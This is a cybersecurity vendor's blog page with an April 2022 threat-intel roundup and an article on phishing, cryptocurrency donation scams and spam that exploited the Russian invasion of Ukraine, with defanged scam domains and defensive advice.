Tessian Threat Intel Roundup for April 2022
by Charles Brook Thursday, April 28th, 2022
Tessian Threat Intel introduces our key threat intelligence themes and topics we have been tracking for the month of April 2022.  The key theme this month focussed on Ukraine-related cyber threat campaigns. We expect nation-state related attacks to escalate in the wake of the Russia invasion. Recommendations for staying include following best practice as outlined by CISA  and NIST. Be sure to sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Phishing campaigns escalated in the wake of the Ukraine invasion Ukrainian themed QR code crypto currency donation fraud featured prominently in phishing campaigns in the wake of the invasion Ramp-up of cyber retaliation by Russia against western countries and targets is expected in the coming weeks The Ukraine invasion is among the first inter- nation-state conventional conflicts to feature a cyber-war (hybrid war) component In order to disrupt nation-state campaigns in Ukraine, public-private partnerships as demonstrated by Microsoft will be key in addressing this threat vector The cyber insurance industry, already in choppy waters before the Ukraine invasion, is set for further turmoil concerning coverage limitations and premiums LinkedIn is now the most popular brand for impersonation in phishing attacks
Tessian Threat Intel have noted a significant escalation of phishing threats in the wake of the Ukraine invasion We take the view along with our colleagues that Russian affiliated APT groups are expected to escalate their attacks on countries allied with Ukraine, with the US, the UK, and the EU key targets in this regard Nation-state cyber attacks are expected to feature more prominently in conventional nation-state conflict based on recent outcomes from the Ukraine invasion  Cyber insurance premiums have doubled over the past 12 months, while coverage has dramatically been reduced A number of leading cyber insurance providers have recently amended their policy coverage to reflect this changing geopolitical risk landscape to specifically exclude acts of war
Threat actors take advantage of key events including conflict and natural disaster events as we witnessed during the recent pandemic Having dedicated executive support and resourcing for cybersecurity programs in the enterprise as outlined by CISA  is essential Defense in depth is key to reducing the likelihood of a successful breach Leveraging Threat Intel insights from your peers and from the cybersecurity vendor community is an important component to keeping aware of the rapidly evolving threatscape Cyber insurance is quickly becoming unaffordable to most small and medium sized companies. This may result in tough trade-offs for firms. Bottom line: Making strategic investments in cybersecurity programs is more important than ever.
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video, download our platform architecture whitepaper, or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Threat Intel, ATO/BEC
Phishing Campaigns Pick-Up in the Wake of the Ukraine Invasion
by Charles Brook Tuesday, April 5th, 2022
Key Takeaways   We’ve seen an upward trend in the number of suspicious emails being flagged related to Ukraine.  Spam campaigns started to appear only one day after the initial invasion by Russia.   The number of new domains containing “Ukraine” registered in 2022 is up 210% from 2021.   An average of 315 new Ukraine themed domains have been observed per day since the 24th February.  77% of these domains appear to be suspicious based on early indicators.
Overview   The conflict taking place in Ukraine has quickly become a common theme for threat actors and scammers alike. Tessian has observed an upward trend in Ukraine themed emails flagged by our platform, including a number of threat campaigns that are exploiting the conflict as a theme for new scams, malspam, and phishing.   In line with this, open source intelligence shows a significant increase in the number of Ukraine themed domains being registered, which can be used for malicious purposes.   The scams observed typically request donations in the form of crypto-currency under the pretense of supporting the Ukrainian humanitarian effort in the wake of the Russian invasion. The spam is similar to common campaigns previously observed, pushing links to suspicious e-commerce sites selling Ukrainian themed items.
Trend analysis Domain registrations   There has been a significant upward trend in the number of new domains being registered that contain “Ukraine”. The number of these domains being registered is up more than 210% in 2022, compared to 2021.   Researching domain registrations , we can see the upward trend progressing over the past two months. 
Since early March there has been an average of 340 new domains registered each day, either containing “Ukraine” or closely resembling the word.  Our platform observed an upward initial trend in Ukraine themed emails, which peaked early March. This included the spam campaigns and donation scams.
Threat campaign explainer  Donation Scams   Donations from around the world have been made in support of Ukraine in the wake of the Russian invasion. Unfortunately, leveraging humanitarian efforts such as the one currently underway in Ukraine to perpetrate phishing-related fraud has become a common modus operandi for threat actors and fraudsters. This explains why phishing remains among the top reported cybersecurity incidents according to the FBI’s latest Internet Crime Report, with over 323k reported incidents for 2021.   The donation scams vary in sophistication from basic emails containing a short message with a plea for help, to fake websites set up to impersonate certain charitable organizations like the British Red Cross.    One of these scam emails claims to be supporting the humanitarian aid effort in Ukraine and is requesting  Bitcoin cryptocurrency donations. Legitimate website  text and logos from the likes of UNICEF, Actalliance and the Australian Council for International Affairs (ACFID) are being fraudulently leveraged to enhance the authenticity of the phishing emails.   The threat campaign detailed below purporting to be a legitimate humanitarian aid effort for Ukraine from the ACFID, requests Bitcoin donations and allows victims to make the donation via direct Bitcoin address or via a malicious QR code.
Phishing email purporting to be from the ACFID  
Scanning the QR code with the iOS camera app will prompt you to open a locally installed payment app that supports Bitcoin. In this case, Cash App.   According to Blockchain Explorer, the last transaction to take place with the address in this email was on 2022-02-14 with only 6 transactions in total.    Another donation scam was sent from a newly registered domain redcrossukraine[.]org impersonating the Red Cross in Ukraine. The email contained a link to a professional looking website containing details of the Ukraine conflict as well as instructions on how to donate cryptocurrency in aid of Ukraine.
The site was based on a bootstrap template by BootstrapMade which gave it the look and feel of a legitimate website. Towards the bottom were references to addresses for 3 different crypto wallets you could send payments to as a ‘donation’. One for Bitcoin, one for Ethereum, and one for Tether cryptocurrency.
Ukraine themed spam   Spammers have also quickly reacted to the invasion of Ukraine by adjusting the themes of their campaigns.    One notable spam campaign, only a day after the initial invasion, began blasting out spam with links to suspicious e-commerce sites pushing the sale of t-shirts and other items to show support for Ukraine.   The emails sent out in the campaign have subjects like “I Stand With Ukraine Shirts” and contain images of t-shirts with slogans in support of Ukraine. The emails also contain links pointing to sites like mimoprint[.]info or mabil-store[.]com where you can browse and purchase some of the products referenced in the email.   Links resolving to recently created sites like mimoprint[.]info or mabil-store[.]com were sent out in emails with subjects like  “I Stand With Ukraine Shirts”. Searching this site online reveals some reviews claiming that they are a scam and if a purchase is made then no product is received. Other reviews claim they steal designs from users on other sites.    Recommended action  Some charities do and are accepting cryptocurrency donations. But be cautious of any emails purporting to aid or receive donations in an effort to support the humanitarian effort in Ukraine. If cryptocurrency is requested from an unsolicited email then the likelihood is that it is a scam.   Before interacting with any Ukrainian themed email received, check the source and email header to confirm the organization it originated from is legitimate.   If you want to make a donation in support of Ukraine, then the best way is to go directly to your preferred charitable organization. CNET has published a list of reputable charities you can donate in aid of Ukraine. 
Read Blog Post